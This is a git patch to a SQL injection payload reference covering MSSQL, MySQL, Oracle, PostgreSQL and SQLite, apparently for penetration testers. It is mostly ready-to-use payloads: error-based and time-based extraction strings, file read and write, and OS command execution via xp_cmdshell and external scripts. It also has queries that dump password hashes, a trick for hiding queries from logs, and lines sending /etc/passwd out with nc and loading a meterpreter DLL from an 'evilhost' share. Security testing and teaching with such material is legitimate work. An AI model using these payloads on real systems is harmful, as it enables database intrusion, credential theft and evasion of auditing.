From 3c5bab03381c4790e8eec99be8fa91a8fc64e49f Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 16 Nov 2024 18:49:01 +0100
Subject: [PATCH] SQL - File Manipulation and Error Based Injection
---
 SQL Injection/MSSQL Injection.md | 135 ++++++++++++++++----------
 SQL Injection/MySQL Injection.md | 24 ++++-
 SQL Injection/OracleSQL Injection.md | 127 +++++++++++++++---------
 SQL Injection/PostgreSQL Injection.md | 132 +++++++++++++------------
 SQL Injection/SQLite Injection.md | 39 ++++++--
 5 files changed, 284 insertions(+), 173 deletions(-)
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index f1f4adb..92c3920 100644
--- a/SQL Injection/MSSQL Injection.md
+++ b/SQL Injection/MSSQL Injection.md
@@ -7,18 +7,19 @@
 * [MSSQL Default Databases](#mssql-default-databases)
 * [MSSQL Comments](#mssql-comments)
-* [MSSQL Database Credentials](#mssql-database-credentials)
 * [MSSQL Enumeration](#mssql-enumeration)
 * [MSSQL List Databases](#mssql-list-databases)
- * [MSSQL List Columns](#mssql-list-columns)
 * [MSSQL List Tables](#mssql-list-tables)
+ * [MSSQL List Columns](#mssql-list-columns)
 * [MSSQL Union Based](#mssql-union-based)
 * [MSSQL Error Based](#mssql-error-based)
 * [MSSQL Blind Based](#mssql-blind-based)
 * [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
 * [MSSQL Time Based](#mssql-time-based)
 * [MSSQL Stacked Query](#mssql-stacked-query)
-* [MSSQL Read File](#mssql-read-file)
+* [MSSQL File Manipulation](#mssql-file-manipulation)
+ * [MSSQL Read File](#mssql-read-file)
+ * [MSSQL Write File](#mssql-write-file)
 * [MSSQL Command Execution](#mssql-command-execution)
 * [XP_CMDSHELL](#xp_cmdshell)
 * [Python Script](#python-script)
@@ -29,6 +30,8 @@
 * [MSSQL Privileges](#mssql-privileges)
 * [MSSQL List Permissions](#mssql-list-permissions)
 * [MSSQL Make User DBA](#mssql-make-user-dba)
+* [MSSQL Database Credentials](#mssql-database-credentials)
+* [MSSQL OPSEC](#mssql-opsec)
 * [References](#references)
@@ -49,47 +52,34 @@ | Type | Description | |----------------------------|-----------------------------------| | `/* MSSQL Comment */` | C-style comment | -| `-- -` | SQL comment | +| `--` | SQL comment | | `;%00` | Null byte | -## MSSQL Database Credentials - -* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` - ```sql - SELECT name, password FROM master..sysxlogins - SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins - -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer - ``` -* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe` - ```sql - SELECT name, password_hash FROM master.sys.sql_logins - SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins - ``` - - ## MSSQL Enumeration -| Description | SQL Query | -| ------------- | ----------------------------------------- | -| DBMS version | `SELECT @@version` | -| Database name | `SELECT DB_NAME()` | -| Hostname | `SELECT HOST_NAME()` | -| Hostname | `SELECT @@hostname` | -| Hostname | `SELECT @@SERVERNAME` | -| Hostname | `SELECT SERVERPROPERTY('productversion')` | -| Hostname | `SELECT SERVERPROPERTY('productlevel')` | -| Hostname | `SELECT SERVERPROPERTY('edition')` | -| User | `SELECT CURRENT_USER` | -| User | `SELECT user_name();` | -| User | `SELECT system_user;` | -| User | `SELECT user;` | +| Description | SQL Query | +| --------------- | ----------------------------------------- | +| DBMS version | `SELECT @@version` | +| Database name | `SELECT DB_NAME()` | +| Database schema | `SELECT SCHEMA_NAME()` | +| Hostname | `SELECT HOST_NAME()` | +| Hostname | `SELECT @@hostname` | +| Hostname | `SELECT @@SERVERNAME` | +| Hostname | `SELECT SERVERPROPERTY('productversion')` | +| Hostname | `SELECT SERVERPROPERTY('productlevel')` | +| Hostname | `SELECT SERVERPROPERTY('edition')` | +| User | 
`SELECT CURRENT_USER` | +| User | `SELECT user_name();` | +| User | `SELECT system_user;` | +| User | `SELECT user;` | ### MSSQL List Databases ```sql SELECT name FROM master..sysdatabases; +SELECT name FROM master.sys.databases; -- for N = 0, 1, 2, … SELECT DB_NAME(N); @@ -99,6 +89,25 @@ SELECT DB_NAME(N); SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; ``` +### MSSQL List Tables + +```sql +-- use xtype = 'V' for views +SELECT name FROM master..sysobjects WHERE xtype = 'U'; +SELECT name FROM ..sysobjects WHERE xtype='U' +SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; + +-- list column names and types for master..sometable +SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; + +SELECT table_catalog, table_name FROM information_schema.columns +SELECT table_name FROM information_schema.tables WHERE table_catalog='' + +-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) +SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; +``` + + ### MSSQL List Columns ```sql 
@@ -109,23 +118,8 @@ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ' SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; SELECT table_catalog, column_name FROM information_schema.columns -``` -### MSSQL List Tables - -```sql --- use xtype = 'V' for views -SELECT name FROM master..sysobjects WHERE xtype = 'U'; - -SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; - --- list column names and types for master..sometable -SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; - -SELECT table_catalog, table_name FROM information_schema.columns - --- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+) -SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; +SELECT COL_NAME(OBJECT_ID('.'), ) ``` @@ -166,6 +160,13 @@ SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; ## MSSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| CONVERT | `AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~')) -- -` | +| IN | `AND 1337 IN (SELECT ('~'+(SELECT @@version)+'~')) -- -` | +| EQUAL | `AND 1337=CONCAT('~',(SELECT @@version),'~') -- -` | +| CAST | `CAST((SELECT @@version) AS INT)` | + * For integer inputs ```sql 
@@ -249,15 +250,31 @@ IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0'; ``` -## MSSQL Read File +## MSSQL File Manipulation + +### MSSQL Read File **Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission. + +```sql +OPENROWSET(BULK 'C:\path\to\file', SINGLE_CLOB) +``` + +Example: + ```sql -1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null ``` +### MSSQL Write File + +```sql +execute spWriteStringToFile 'contents', 'C:\path\to\', 'file' +``` + + ## MSSQL Command Execution ### XP_CMDSHELL @@ -268,7 +285,7 @@ EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; ``` -If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) +If you need to reactivate `xp_cmdshell` (disabled by default in SQL Server 2005) ```sql EXEC sp_configure 'show advanced options',1; @@ -282,7 +299,6 @@ RECONFIGURE; > Executed by a different user than the one using `xp_cmdshell` to execute commands ```powershell -# Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' 
@@ -401,6 +417,21 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; ``` +## MSSQL Database Credentials + +* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` + ```sql + SELECT name, password FROM master..sysxlogins + SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins + -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer + ``` +* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe` + ```sql + SELECT name, password_hash FROM master.sys.sql_logins + SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins + ``` + + ## MSSQL OPSEC Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password` diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 3a9e542..90441f0 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -69,7 +69,7 @@ MySQL comments are annotations in SQL code that are ignored by the MySQL server | `/* MYSQL Comment */` | C-style comment | | `/*! MYSQL Special SQL */` | Special SQL | | `/*!32302 10*/` | Comment for MYSQL version 3.23.02 | -| `-- -` | SQL comment | +| `--` | SQL comment | | `;%00` | Nullbyte | | \` | Backtick | 
@@ -229,6 +229,17 @@ MariaDB [dummydb]> SELECT AUTHOR_ID,TITLE FROM POSTS WHERE AUTHOR_ID=-1 UNION SE ## MYSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| GTID_SUBSET | `AND GTID_SUBSET(CONCAT('~',(SELECT version()),'~'),1337) -- -` | +| JSON_KEYS | `AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('~',(SELECT version()),'~')) USING utf8))) -- -` | +| EXTRACTVALUE | `AND EXTRACTVALUE(1337,CONCAT('.','~',(SELECT version()),'~')) -- -` | +| UPDATEXML | `AND UPDATEXML(1337,CONCAT('.','~',(SELECT version()),'~'),31337) -- -` | +| EXP | `AND EXP(~(SELECT * FROM (SELECT CONCAT('~',(SELECT version()),'~','x'))x)) -- -` | +| OR | `OR 1 GROUP BY CONCAT('~',(SELECT version()),'~',FLOOR(RAND(0)*2)) HAVING MIN(0) -- -` | +| NAME_CONST | `AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--` | + + ### MYSQL Error Based - Basic Works with `MySQL >= 4.1` @@ -373,6 +384,8 @@ The following SQL codes will delay the output from MySQL. RLIKE SLEEP([SLEEPTIME]) OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) XOR(IF(NOW()=SYSDATE(),SLEEP(5),0))XOR + AND SLEEP(10)=0 + AND (SELECT 1337 FROM (SELECT(SLEEP(10-(IF((1=1),0,10))))) RANDSTR) ``` ### Using SLEEP in a Subselect @@ -662,12 +675,19 @@ mysql> SELECT @@version; | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ -mysql> mysql> SELECT version(); +mysql> SELECT version(); +-------------------------+ | version() | +-------------------------+ | 5.6.31-0ubuntu0.15.10.1 | +-------------------------+ + +mysql> SELECT @@GLOBAL.VERSION; ++------------------+ +| @@GLOBAL.VERSION | ++------------------+ +| 8.0.27 | ++------------------+ ``` diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index bad7a21..3207511 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md 
@@ -7,13 +7,12 @@
 * [Oracle SQL Default Databases](#oracle-sql-default-databases)
 * [Oracle SQL Comments](#oracle-sql-comments)
-* [Oracle SQL Version](#oracle-sql-version)
-* [Oracle SQL Hostname](#oracle-sql-hostname)
-* [Oracle SQL Database Name](#oracle-sql-database-name)
+* [Oracle SQL Enumeration](#oracle-sql-enumeration)
 * [Oracle SQL Database Credentials](#oracle-sql-database-credentials)
-* [Oracle SQL List Databases](#oracle-sql-list-databases)
-* [Oracle SQL List Columns](#oracle-sql-list-columns)
-* [Oracle SQL List Tables](#oracle-sql-list-tables)
+* [Oracle SQL Methodology](#oracle-sql-methodology)
+ * [Oracle SQL List Databases](#oracle-sql-list-databases)
+ * [Oracle SQL List Tables](#oracle-sql-list-tables)
+ * [Oracle SQL List Columns](#oracle-sql-list-columns)
 * [Oracle SQL Error Based](#oracle-sql-error-based)
 * [Oracle SQL Blind](#oracle-sql-blind)
 * [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
@@ -22,6 +21,11 @@
 * [Oracle SQL Command Execution](#oracle-sql-command-execution)
 * [Oracle Java Execution](#oracle-java-execution)
 * [Oracle Java Class](#oracle-java-class)
+* [OracleSQL File Manipulation](#OracleSQL-file-manipulation)
+ * [OracleSQL Read File](#OracleSQL-read-file)
+ * [OracleSQL Write File](#OracleSQL-write-file)
+ * [Package os_command](#package-os_command)
+ * [DBMS_SCHEDULER Jobs](#dbms_scheduler-jobs)
 * [References](#references)
@@ -35,39 +39,30 @@ ## Oracle SQL Comments -| Type | Description | -|----------------------------|-----------------------------------| -| `-- -` | SQL comment | +| Type | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## Oracle SQL Version +## Oracle SQL Enumeration -```sql -SELECT user FROM dual UNION SELECT * FROM v$version -SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; -SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; -SELECT version FROM v$instance; -``` - - -## Oracle SQL Hostname - -```sql -SELECT host_name FROM v$instance; (Privileged) -SELECT UTL_INADDR.get_host_name FROM dual; -SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -SELECT UTL_INADDR.get_host_address FROM dual; -``` - - -## Oracle SQL Database Name - -```sql -SELECT global_name FROM global_name; -SELECT name FROM V$DATABASE; -SELECT instance_name FROM V$INSTANCE; -SELECT SYS.DATABASE_NAME FROM DUAL; -``` +| Description | SQL Query | +| ------------- | ------------------------------------------------------------ | +| DBMS version | `SELECT user FROM dual UNION SELECT * FROM v$version` | +| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';` | +| DBMS version | `SELECT banner FROM v$version WHERE banner LIKE 'TNS%';` | +| DBMS version | `SELECT BANNER FROM gv$version WHERE ROWNUM = 1;` | +| DBMS version | `SELECT version FROM v$instance;` | +| Hostname | `SELECT UTL_INADDR.get_host_name FROM dual;` | +| Hostname | `SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;` | +| Hostname | `SELECT UTL_INADDR.get_host_address FROM dual;` | +| Hostname | `SELECT host_name FROM v$instance;` | +| Database name | `SELECT global_name FROM global_name;` | +| Database name | `SELECT name FROM V$DATABASE;` | +| Database name | `SELECT instance_name FROM V$INSTANCE;` | +| Database name | `SELECT SYS.DATABASE_NAME FROM DUAL;` | +| Database name | `SELECT sys_context('USERENV', 'CURRENT_SCHEMA') FROM 
dual;` | ## Oracle SQL Database Credentials @@ -79,27 +74,29 @@ SELECT SYS.DATABASE_NAME FROM DUAL; | `SELECT name, spare4 from sys.user$;` | Privileged, <= 11g | -## Oracle SQL List Databases +## Oracle SQL Methodology + +### Oracle SQL List Databases ```sql SELECT DISTINCT owner FROM all_tables; +SELECT OWNER FROM (SELECT DISTINCT(OWNER) FROM SYS.ALL_TABLES) ``` - -## Oracle SQL List Columns - -```sql -SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; -SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo'; -``` - - -## Oracle SQL List Tables +### Oracle SQL List Tables ```sql SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; +SELECT OWNER,TABLE_NAME FROM SYS.ALL_TABLES WHERE OWNER='' +``` + +### Oracle SQL List Columns + +```sql +SELECT column_name FROM all_tab_columns WHERE table_name = 'blah'; +SELECT COLUMN_NAME,DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='' AND OWNER='' ``` @@ -115,6 +112,8 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; | SQL Error | `SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1))` | | XDBURITYPE getblob | `XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()` | | XDBURITYPE getclob | `XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()` | +| XMLType | `AND 1337=(SELECT UPPER(XMLType(CHR(60)\|\|CHR(58)\|\|'~'\|\|(REPLACE(REPLACE(REPLACE(REPLACE((SELECT banner FROM v$version),' ','_'),'$','(DOLLAR)'),'@','(AT)'),'#','(HASH)'))\|\|'~'\|\|CHR(62))) FROM DUAL) -- -` | +| DBMS_UTILITY | `AND 1337=DBMS_UTILITY.SQLID_TO_SQLHASH('~'\|\|(SELECT banner FROM v$version)\|\|'~') -- -` | When the injection point is inside a string use : `'||PAYLOAD--` 
@@ -141,6 +140,7 @@ When the injection point is inside a string use : `'||PAYLOAD--` ```sql AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) +AND 1337=(CASE WHEN (1=1) THEN DBMS_PIPE.RECEIVE_MESSAGE('RANDSTR',10) ELSE 1337 END) ``` @@ -209,7 +209,38 @@ SELECT EXTRACTVALUE(xmltype('') cmd from dual +``` + +### DBMS_SCHEDULER Jobs + +```sql +DBMS_SCHEDULER.CREATE_JOB (job_name => 'exec', job_type => 'EXECUTABLE', job_action => '', enabled => TRUE) +``` + + +## OracleSQL File Manipulation + +:warning: Only in a stacked query. + +### OracleSQL Read File + +```sql +utl_file.get_line(utl_file.fopen('/path/to/','file','R'), ) +``` + +### OracleSQL Write File + +```sql +utl_file.put_line(utl_file.fopen('/path/to/','file','R'), ) +``` + ## References diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 5e21ab2..f79b474 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -6,12 +6,8 @@ ## Summary * [PostgreSQL Comments](#postgresql-comments) -* [PostgreSQL Version](#postgresql-version) -* [PostgreSQL Current User](#postgresql-current-user) -* [PostgreSQL Privileges](#postgresql-privileges) - * [PostgreSQL List Privileges](#postgresql-list-privileges) - * [PostgreSQL Superuser Role](#postgresql-superuser-role) * [PostgreSQL Enumeration](#postgresql-enumeration) +* [PostgreSQL Methodology](#postgresql-methodology) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) 
@@ -27,72 +23,65 @@ * [Using libc.so.6](#using-libcso6) * [PostgreSQL WAF Bypass](#postgresql-waf-bypass) * [Alternative to Quotes](#alternative-to-quotes) +* [PostgreSQL Privileges](#postgresql-privileges) + * [PostgreSQL List Privileges](#postgresql-list-privileges) + * [PostgreSQL Superuser Role](#postgresql-superuser-role) * [References](#references) ## PostgreSQL Comments -| Type | Comment | -| ---- | ------- | -| Single-Line Comment | `--` | -| Multi-Line Comment | `/**/` | +| Type | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## PostgreSQL Version - -```sql -SELECT version() -``` - -## PostgreSQL Current User - -```sql -SELECT user; -SELECT current_user; -SELECT session_user; -SELECT usename FROM pg_user; -SELECT getpgusername(); -``` - - -## PostgreSQL Privileges - -### PostgreSQL List Privileges - -Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`. 
- -```sql -SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); -``` - -### PostgreSQL Superuser Role - -```sql -SHOW is_superuser; -SELECT current_setting('is_superuser'); -SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; -``` - ## PostgreSQL Enumeration -| SQL Query | Description | -| --------------------------------------- | -------------- | -| `SELECT current_database()` | Database Name | -| `SELECT datname FROM pg_database` | List Databases | -| `SELECT table_name FROM information_schema.tables` | List Tables | -| `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | List Columns | -| `SELECT usename FROM pg_user` | List PostgreSQL Users | -| `SELECT usename, passwd FROM pg_shadow` | List Password Hashes | -| `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | List Database Administrator Accounts | +| Description | SQL Query | +| ---------------------- | --------------------------------------- | +| DBMS version | `SELECT version()` | +| Database Name | `SELECT CURRENT_DATABASE()` | +| Database Schema | `SELECT CURRENT_SCHEMA()` | +| List PostgreSQL Users | `SELECT usename FROM pg_user` | +| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` | +| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` | +| Current User | `SELECT user;` | +| Current User | `SELECT current_user;` | +| Current User | `SELECT session_user;` | +| Current User | `SELECT usename FROM pg_user;` | +| Current User | `SELECT getpgusername();` | + + +## PostgreSQL Methodology + +| Description | SQL Query | +| ---------------------- | -------------------------------------------- | +| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` | +| List Databases | `SELECT datname FROM pg_database` | +| List Tables | `SELECT table_name FROM information_schema.tables` | +| List Tables | `SELECT table_name FROM 
information_schema.tables WHERE table_schema=''` | +| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = ''` | +| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` | ## PostgreSQL Error Based +| Name | Payload | +| ------------ | --------------- | +| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` | +| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` | +| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` | +| CAST | `AND (SELECT version())::int=1 -- -` | + + + ```sql -,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) -,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name='data_table'+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- -,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) +CAST(chr(126)||VERSION()||chr(126) AS NUMERIC) +CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)-- +CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)-- +CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC) ``` ```sql 
@@ -105,14 +94,14 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; ### PostgreSQL XML Helpers ```sql -select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row +SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row ``` The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result. ```sql -select database_to_xml(true,true,''); -- dump the current database to XML -select database_to_xmlschema(true,true,''); -- dump the current db to an XML schema +SELECT database_to_xml(true,true,''); -- dump the current database to XML +SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema ``` Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. @@ -166,6 +155,7 @@ select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end ``` ```sql +AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR' AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ``` @@ -276,9 +266,9 @@ SELECT system('cat /etc/passwd | nc '); ``` -### PostgreSQL WAF Bypass +## PostgreSQL WAF Bypass -#### Alternative to Quotes +### Alternative to Quotes | Payload | Technique | | ------------------ | --------- | 
@@ -286,6 +276,24 @@ SELECT system('cat /etc/passwd | nc '); | `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) | +## PostgreSQL Privileges + +### PostgreSQL List Privileges + +Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`. + +```sql +SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); +``` + +### PostgreSQL Superuser Role + +```sql +SHOW is_superuser; +SELECT current_setting('is_superuser'); +SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER; +``` + ## References - [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9) diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index d4b102c..c6a1c80 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md @@ -6,7 +6,7 @@ ## Summary * [SQLite Comments](#sqlite-comments) -* [SQLite Version](#sqlite-version) +* [SQLite Enumeration](#sqlite-enumeration) * [SQLite String](#sqlite-string) * [SQLite String Methodology](#sqlite-string-methodology) * [SQLite Blind](#sqlite-blind) 
@@ -17,22 +17,26 @@ * [SQlite Remote Code Execution](#sqlite-remote-code-execution) * [Attach Database](#attach-database) * [Load_extension](#load_extension) +* [SQLite File Manipulation](#SQLite-file-manipulation) + * [SQLite Read File](#SQLite-read-file) + * [SQLite Write File](#SQLite-write-file) * [References](#references) ## SQLite Comments -| Type | Description | -|----------------------------|-----------------------------------| -| `/* SQLite Comment */` | C-style comment | -| `--` | SQL comment | +| Description | Comment | +| ------------------- | ------- | +| Single-Line Comment | `--` | +| Multi-Line Comment | `/**/` | -## SQLite Version +## SQLite Enumeration + +| Description | SQL Query | +| ------------- | ----------------------------------------- | +| DBMS version | `select sqlite_version();` | -```sql -select sqlite_version(); -``` ## SQLite String @@ -42,9 +46,12 @@ select sqlite_version(); | ----------------------- | ----------------------------------------- | | Extract Database Structure | `SELECT sql FROM sqlite_schema` | | Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` | +| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` | | Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` | | Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` | | Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` | +| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name=''` | +| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('')` | ## SQLite Blind @@ -78,6 +85,7 @@ AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) +AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ``` 
@@ -100,6 +108,19 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain'); ``` +## SQLite File Manipulation + +### SQLite Read File + +SQLite does not support file I/O operations by default. + + +### SQLite Write File + +```sql +SELECT writefile('/path/to/file', column_name) FROM table_name +``` + ## References